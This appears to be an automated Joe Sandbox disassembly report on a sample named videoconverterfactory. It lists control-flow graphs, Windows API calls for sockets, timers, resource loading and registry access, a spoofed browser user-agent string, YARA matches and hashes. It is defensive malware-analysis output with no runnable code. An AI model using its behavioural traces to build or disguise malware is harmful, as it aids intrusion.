                                                                                                      control_flow_graph 809 2d24d86-2d24dcb call 2d42a10 call 2d2fb20 RtlEnterCriticalSection RtlLeaveCriticalSection 814 2d24dd1 809->814 815 2d250d4-2d250dd 809->815 818 2d24dd6-2d24e00 call 2d23863 call 2d24bed 814->818 816 2d250e4-2d250f4 815->816 817 2d250df call 2d2380b 815->817 817->816 824 2d250a1-2d250ad RtlEnterCriticalSection RtlLeaveCriticalSection 818->824 825 2d24e06-2d24e0b 818->825 828 2d250b3-2d250ce RtlEnterCriticalSection RtlLeaveCriticalSection 824->828 826 2d24e11-2d24e3a call 2d2bede 825->826 827 2d2506e-2d25070 825->827 826->824 833 2d24e40-2d24e5c call 2d26d29 826->833 827->824 830 2d25072-2d2509f call 2d2972a 827->830 828->815 828->818 830->824 830->828 837 2d24ec4-2d24ec8 833->837 838 2d24e5e-2d24e7c call 2d2bede 833->838 839 2d24eca-2d24ef9 call 2d2bede 837->839 840 2d24e8d-2d24e99 RtlEnterCriticalSection RtlLeaveCriticalSection 837->840 843 2d24e81-2d24e87 838->843 839->840 848 2d24efb-2d24f2c call 2d2bede 839->848 844 2d24e9f-2d24ea6 RtlEnterCriticalSection RtlLeaveCriticalSection 840->844 843->840 846 2d24f98-2d24fc1 call 2d2bede 843->846 847 2d24eac-2d24ebf call 2d27991 844->847 854 2d24fc7-2d24ff0 call 2d2bede 846->854 855 2d25064-2d25069 846->855 847->828 848->840 858 2d24f32-2d24f93 call 2d2c010 call 2d27991 call 2d27706 call 2d27991 848->858 854->855 861 2d24ff2-2d25028 call 2d26d03 call 2d299b7 call 2d29a8f 854->861 855->844 858->846 873 2d2502d-2d25050 call 2d27991 call 2d30900 861->873 873->847 878 2d25056-2d2505f call 2d24100 873->878 878->847
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24D8B
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24DB7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24DC3
                                                                                                        • Part of subcall function 02D24BED: __EH_prolog.LIBCMT ref: 02D24BF2
                                                                                                        • Part of subcall function 02D24BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D24CF2
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24E93
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24E99
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D24EA0
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D24EA6
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D250A7
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D250AD
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D250B8
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D250C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                      • String ID:
                                                                                                      • API String ID: 2062355503-0
                                                                                                      • Opcode ID: 64d634080501fb7635a5fcdb5c848500667d76c8985e38a1e3cc0f1d5b5509b4
                                                                                                      • Instruction ID: 12a7f6025800a04e744d6ca67d494f22813b08005867053ce22b81738079eff2
                                                                                                      • Opcode Fuzzy Hash: 64d634080501fb7635a5fcdb5c848500667d76c8985e38a1e3cc0f1d5b5509b4
                                                                                                      • Instruction Fuzzy Hash: 18B13A71D0422E9FEF25DFA0D844BEDBBB5AF14318F20409AE80566280DBB55E49CFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 881 401301-40135e FindResourceA 882 401360-401362 881->882 883 401367-40137d SizeofResource 881->883 884 401538-40153c 882->884 885 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 883->885 886 40137f-401381 883->886 891 401407-40140b 885->891 886->884 892 40140d-40141d 891->892 893 40141f-401428 GetTickCount 891->893 892->891 895 401491-401499 893->895 896 40142a-40142e 893->896 897 4014a2-4014a8 895->897 898 401430-401438 896->898 899 40148f 896->899 900 4014f0-401525 GlobalAlloc call 401000 897->900 901 4014aa-4014e8 897->901 902 401441-401447 898->902 899->900 911 40152a-401535 900->911 903 4014ea 901->903 904 4014ee 901->904 906 401449-401485 902->906 907 40148d 902->907 903->904 904->897 908 401487 906->908 909 40148b 906->909 907->896 908->909 909->902 911->884
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3019604839-3916222277
                                                                                                      • Opcode ID: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                      • Instruction ID: b28a29316e79cb766f5da1f380b87f9e4da6436ce9bd12b8eed34f014587212c
                                                                                                      • Opcode Fuzzy Hash: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
                                                                                                      • Instruction Fuzzy Hash: 28810171D04258DFDF01CFE8D985AEEBBB0FB09315F1400AAE581B7262C3385A85DB69

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02D22706
                                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D2272B
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D43173), ref: 02D22738
                                                                                                        • Part of subcall function 02D21712: __EH_prolog.LIBCMT ref: 02D21717
                                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D22778
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02D227D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID: timer
                                                                                                      • API String ID: 4293676635-1792073242
                                                                                                      • Opcode ID: 98fd21c31b689c877025d1a1ee0ffcaa508a60d29ede3b54e46f78824e7f0670
                                                                                                      • Instruction ID: 7eb9db676fec1efe5a8026dccbde6766207fbc1c1ed527840a8274dac4ca2a4d
                                                                                                      • Opcode Fuzzy Hash: 98fd21c31b689c877025d1a1ee0ffcaa508a60d29ede3b54e46f78824e7f0670
                                                                                                      • Instruction Fuzzy Hash: 3A317CB5908715AFD3109F25D848B16BBE8FB58769F104A2AF85587B80D770EC18CFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1047 2d21ba7-2d21bcf call 2d42a10 RtlEnterCriticalSection 1050 2d21bd1 1047->1050 1051 2d21be9-2d21bf7 RtlLeaveCriticalSection call 2d2d335 1047->1051 1052 2d21bd4-2d21be0 call 2d21b79 1050->1052 1054 2d21bfa-2d21c20 RtlEnterCriticalSection 1051->1054 1057 2d21be2-2d21be7 1052->1057 1058 2d21c55-2d21c6e RtlLeaveCriticalSection 1052->1058 1056 2d21c34-2d21c36 1054->1056 1059 2d21c22-2d21c2f call 2d21b79 1056->1059 1060 2d21c38-2d21c43 1056->1060 1057->1051 1057->1052 1062 2d21c45-2d21c4b 1059->1062 1065 2d21c31 1059->1065 1060->1062 1062->1058 1064 2d21c4d-2d21c51 1062->1064 1064->1058 1065->1056
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 1633115879-0
                                                                                                      • Opcode ID: 70495748563475fe7d3f167a0838410c3ea60c9b906b4de94efab64342a7127b
                                                                                                      • Instruction ID: 41814555de225317ef4dfbdd0a335df7a524bb8d2d6412da68fa0b80a482d5dd
                                                                                                      • Opcode Fuzzy Hash: 70495748563475fe7d3f167a0838410c3ea60c9b906b4de94efab64342a7127b
                                                                                                      • Instruction Fuzzy Hash: 00219C79900224AFDB14CF68D44479ABBB5FF59318F208549EC5997302D771ED09CBE0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1067 2d26148-2d2615b 1068 2d260fa 1067->1068 1069 2d2615d-2d2616d 1067->1069 1070 2d26105 Sleep 1068->1070 1071 2d2610b-2d26218 RtlEnterCriticalSection RtlLeaveCriticalSection 1070->1071 1073 2d26261-2d26264 1071->1073 1074 2d2621a-2d26260 1071->1074 1075 2d26266-2d2626c 1073->1075 1076 2d2628b-2d26338 1073->1076 1074->1073 1080 2d26371 1076->1080 1081 2d2633a-2d2634f 1076->1081 1084 2d263a3 1080->1084 1085 2d26373-2d2638a 1080->1085 1082 2d263c3-2d263ef 1081->1082 1083 2d26351-2d2635c 1081->1083 1089 2d263f1-2d263f7 1082->1089 1090 2d263ff-2d26449 1082->1090 1088 2d263a4-2d263af 1083->1088 1091 2d2635e-2d26360 1083->1091 1084->1088 1086 2d263b3-2d263c2 1085->1086 1087 2d2638c-2d26397 1085->1087 1086->1082 1087->1084 1092 2d263b1-2d263b2 1088->1092 1093 2d263fd-2d263fe 1088->1093 1094 2d26470-2d26499 call 2d33760 call 2d2439c 1089->1094 1095 2d263f9-2d263fb 1089->1095 1096 2d26465-2d2646f 1090->1096 1097 2d2644b-2d26451 1090->1097 1092->1086 1093->1090 1098 2d260f1-2d260f3 1094->1098 1110 2d2649f-2d264ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2d3134c 1094->1110 1095->1093 1096->1094 1096->1098 1100 2d26453-2d26455 1097->1100 1101 2d26457-2d26464 call 2d2534d 1097->1101 1104 2d260f5 1098->1104 1105 2d260fc-2d260fe 1098->1105 1100->1096 1101->1096 1104->1068 1105->1071 1107 2d26100 1105->1107 1107->1070 1113 2d26514-2d2652c call 2d3134c 1110->1113 1114 2d264cc-2d264db call 2d3134c 1110->1114 1119 2d26532-2d26534 1113->1119 1120 2d267d3-2d267e2 call 2d3134c 1113->1120 1114->1113 1121 2d264dd-2d264ec call 2d3134c 1114->1121 1119->1120 1123 2d2653a-2d265e5 call 2d31fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d33760 * 5 call 2d2439c * 2 1119->1123 1128 2d26827-2d26836 call 2d3134c 1120->1128 1129 2d267e4-2d267e6 1120->1129 1121->1113 1131 2d264ee-2d264fd call 2d3134c 1121->1131 1175 2d26622 1123->1175 1176 2d265e7-2d265e9 1123->1176 1140 2d2684b-2d2685a call 2d3134c 1128->1140 1141 2d26838-2d26846 call 2d25c12 call 2d25d20 1128->1141 1129->1128 1132 2d267e8-2d26822 call 2d33760 RtlEnterCriticalSection RtlLeaveCriticalSection 1129->1132 1131->1113 1142 2d264ff-2d2650e call 2d3134c 1131->1142 1132->1098 1140->1098 1155 2d26860-2d26862 1140->1155 1141->1098 1142->1098 1142->1113 1155->1098 1158 2d26868-2d26881 call 2d2439c 1155->1158 1158->1098 1164 2d26887-2d26956 call 2d31428 call 2d21ba7 1158->1164 1173 2d26958 call 2d2143f 1164->1173 1174 2d2695d-2d2697e RtlEnterCriticalSection 1164->1174 1173->1174 1179 2d26980-2d26987 1174->1179 1180 2d2698a-2d269f1 RtlLeaveCriticalSection call 2d23c67 call 2d23d7e call 2d27340 1174->1180 1177 2d26626-2d26654 call 2d31fbc call 2d33760 call 2d2439c 1175->1177 1176->1175 1181 2d265eb-2d265fd call 2d3134c 1176->1181 1199 2d26656-2d26665 call 2d325f6 1177->1199 1200 2d26695-2d2669e call 2d31f84 1177->1200 1179->1180 1201 2d269f7-2d26a39 call 2d2972a 1180->1201 1202 2d26b59-2d26b6d call 2d28008 1180->1202 1181->1175 1190 2d265ff-2d26620 call 2d2439c 1181->1190 1190->1177 1199->1200 1213 2d26667 1199->1213 1211 2d267c1-2d267ce 1200->1211 1212 2d266a4-2d266bc call 2d327c5 1200->1212 1214 2d26b23-2d26b54 call 2d273ef call 2d233b2 1201->1214 1215 2d26a3f-2d26a46 1201->1215 1202->1098 1211->1098 1225 2d266c8 1212->1225 1226 2d266be-2d266c6 call 2d2873c 1212->1226 1218 2d2666c-2d2667e call 2d31860 1213->1218 1214->1202 1216 2d26a49-2d26a4e 1215->1216 1216->1216 1220 2d26a50-2d26a95 call 2d2972a 1216->1220 1232 2d26683-2d26693 call 2d325f6 1218->1232 1233 2d26680 1218->1233 1220->1214 1235 2d26a9b-2d26aa1 1220->1235 1231 2d266ca-2d2676e call 2d29854 call 2d23863 call 2d25119 call 2d23863 call 2d29afa call 2d29c14 1225->1231 1226->1231 1257 2d26770 call 2d2380b 1231->1257 1258 2d26775-2d267a0 Sleep call 2d30900 1231->1258 1232->1200 1232->1218 1233->1232 1239 2d26aa4-2d26aa9 1235->1239 1239->1239 1242 2d26aab-2d26ae6 call 2d2972a 1239->1242 1242->1214 1248 2d26ae8-2d26b22 call 2d2c11c 1242->1248 1248->1214 1257->1258 1262 2d267a2-2d267ab call 2d24100 1258->1262 1263 2d267ac-2d267ba 1258->1263 1262->1263 1263->1211 1265 2d267bc call 2d2380b 1263->1265 1265->1211
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02D26105
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D26110
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26121
                                                                                                      Strings
                                                                                                      • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D2612A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                      • API String ID: 1566154052-1923541051
                                                                                                      • Opcode ID: c57c9d7763ad564e56383d8d19bdd40773bc315e08700403c1a5a84774377b08
                                                                                                      • Instruction ID: 178af37f4304ef886dc48ee7da11516ee07851976150f9d21b610f35c22550df
                                                                                                      • Opcode Fuzzy Hash: c57c9d7763ad564e56383d8d19bdd40773bc315e08700403c1a5a84774377b08
                                                                                                      • Instruction Fuzzy Hash: A3F096365483A19FDB018F78F445A9B7BE4FF5A314B640459F4CA8B301C7A0AC95CB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1268 4020d3-4020de 1269 40df7f-40df87 RegQueryValueExA 1268->1269 1270 40d3e7-40debe RegCloseKey call 402940 1269->1270 1271 40df8d 1269->1271 1270->1269 1273 40df8f 1271->1273 1273->1273
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5C0
                                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DF7F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseQueryValue
                                                                                                      • String ID: Common AppData$VideoConverterFactory
                                                                                                      • API String ID: 3356406503-46554496
                                                                                                      • Opcode ID: 4bd605d6b248741e3a08392c033a23d08e08e71fb0696f03597aae14ee4ff204
                                                                                                      • Instruction ID: 1cbcf9b93556dadd5360716ed4734d65c90eaf86505e2607d357aa1c902eaf8f
                                                                                                      • Opcode Fuzzy Hash: 4bd605d6b248741e3a08392c033a23d08e08e71fb0696f03597aae14ee4ff204
                                                                                                      • Instruction Fuzzy Hash: 2DE04F70E4C511EBDB111BE04E04E6B7974AE54314721443BA953711D1C7BD940ABA6F

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 00402A46
                                                                                                        • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                        • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                      • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                                        • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2057626494-0
                                                                                                      • Opcode ID: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                      • Instruction ID: 77a0c2ab577daa94e22818ed769fd4cb67ba6910a5c0d3980e0314dd63f46b93
                                                                                                      • Opcode Fuzzy Hash: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                      • Instruction Fuzzy Hash: 31214CB19006159EDB14AFA6DE4AA6E7FA9EB04715F10413EF905BB2D1DB384900CA6C
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22EEE
                                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D22EFD
                                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D22F0C
                                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D22F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2093263913-0
                                                                                                      • Opcode ID: 87e8a629409ff24456542e19b8ea6cffbd39c688cd110f5ca2740f01afad4057
                                                                                                      • Instruction ID: a7073fb4483245bed6797f07021f1f9c40a756945623818746492219d4ad94b3
                                                                                                      • Opcode Fuzzy Hash: 87e8a629409ff24456542e19b8ea6cffbd39c688cd110f5ca2740f01afad4057
                                                                                                      • Instruction Fuzzy Hash: 66017576900214BBDB209F66DC88B5A7BA9EB95765F008965FA18CB281D7708D04CBA0
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D22D39: WSASetLastError.WS2_32(00000000), ref: 02D22D47
                                                                                                        • Part of subcall function 02D22D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D22D5C
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22E6D
                                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D22E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Sendselect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 2958345159-280543908
                                                                                                      • Opcode ID: cc7dcfbd18ddcc16e5243b233ba4f61068269010c6a125f0b18c2c15be4bc9a9
                                                                                                      • Instruction ID: fb29dbd2ff4b4dc3894560bc70d0ed3fdb860bba805b1a4c81b4020697c57122
                                                                                                      • Opcode Fuzzy Hash: cc7dcfbd18ddcc16e5243b233ba4f61068269010c6a125f0b18c2c15be4bc9a9
                                                                                                      • Instruction Fuzzy Hash: 92316AB1A002259FDB109F64C8587EEBBAAEF65358F00495AEC1497340E7759D58CBE0
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D273D8,?,?,00000000), ref: 02D286D5
                                                                                                      • getsockname.WS2_32(?,?,?), ref: 02D286EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastgetsockname
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 566540725-655172784
                                                                                                      • Opcode ID: 07a8033f257f0b722e61382a2b7af7109ecee59e4745f2b20ede812213a48216
                                                                                                      • Instruction ID: 71f68157f1aac218f20a8920e4d8837c80e5d0fa339d76aa2cf319489897fdb8
                                                                                                      • Opcode Fuzzy Hash: 07a8033f257f0b722e61382a2b7af7109ecee59e4745f2b20ede812213a48216
                                                                                                      • Instruction Fuzzy Hash: E0212176A042589FDB10DF68D854A8EB7F5FF58324F11856AE918EB380D730ED498B60
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22AEA
                                                                                                      • connect.WS2_32(?,?,?), ref: 02D22AF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastconnect
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 374722065-280543908
                                                                                                      • Opcode ID: 38a16b72ffb78f267532147f384d2e6ae9e8ade2a1bea5d5b02f0eab57db9c07
                                                                                                      • Instruction ID: 798c5aac27902d1907c62c961bce7feb444c8bfe73ccd74ee9065a2aa60bcecf
                                                                                                      • Opcode Fuzzy Hash: 38a16b72ffb78f267532147f384d2e6ae9e8ade2a1bea5d5b02f0eab57db9c07
                                                                                                      • Instruction Fuzzy Hash: F221AA75E002245BCF10EF74D4186ADB7BADF54728F108599EC1897384DB745D09CFA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: aa15e0f8976d7b9fc5d1404d2d40803ed59f4ef60156dbd38c211a89264a748d
                                                                                                      • Instruction ID: f1fcfa71c85f3cd751a1d3d67b6a28f8c11fdc998872da9c75e5755b29b55cd0
                                                                                                      • Opcode Fuzzy Hash: aa15e0f8976d7b9fc5d1404d2d40803ed59f4ef60156dbd38c211a89264a748d
                                                                                                      • Instruction Fuzzy Hash: 87515AB1904266DFCB58CF68D4506AABBB5FF18324F10819EE8699B380D734DD14CFA0
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02D236A7
                                                                                                        • Part of subcall function 02D22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D22432
                                                                                                        • Part of subcall function 02D22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D22445
                                                                                                        • Part of subcall function 02D22420: RtlEnterCriticalSection.NTDLL(?), ref: 02D22454
                                                                                                        • Part of subcall function 02D22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D22469
                                                                                                        • Part of subcall function 02D22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D22470
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1601054111-0
                                                                                                      • Opcode ID: 38d9b1aca486574b98f311cac7cf199c1511287f21e1315f660f48035be80cf6
                                                                                                      • Instruction ID: ff7476988b253e64514b797884168552fa86f740f056eeb0384ff34adada766c
                                                                                                      • Opcode Fuzzy Hash: 38d9b1aca486574b98f311cac7cf199c1511287f21e1315f660f48035be80cf6
                                                                                                      • Instruction Fuzzy Hash: D81104B5100248ABDF218E14DC45FAA3BAAEB30358F104456FD418B390C738EC68CB90
                                                                                                      APIs
                                                                                                      • __beginthreadex.LIBCMT ref: 02D31116
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D2998E,00000000), ref: 02D31147
                                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D2998E,00000000), ref: 02D31155
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                      • String ID:
                                                                                                      • API String ID: 1685284544-0
                                                                                                      • Opcode ID: 6329790a470c0c4e3f47668c909b0381a60f69ca925b826b0bda9d518365272d
                                                                                                      • Instruction ID: b5d0308af0e04b2bc8def82ccbda8e1ff7a50982324b358c9aebc9283394534d
                                                                                                      • Opcode Fuzzy Hash: 6329790a470c0c4e3f47668c909b0381a60f69ca925b826b0bda9d518365272d
                                                                                                      • Instruction Fuzzy Hash: F0F0C270240211ABEB219E6CEC80F9573E8EF59725F24056AF548D7380C7A1EC92CA90
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(02D5529C), ref: 02D21ABA
                                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02D21ACB
                                                                                                      • InterlockedExchange.KERNEL32(02D552A0,00000000), ref: 02D21AD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856147945-0
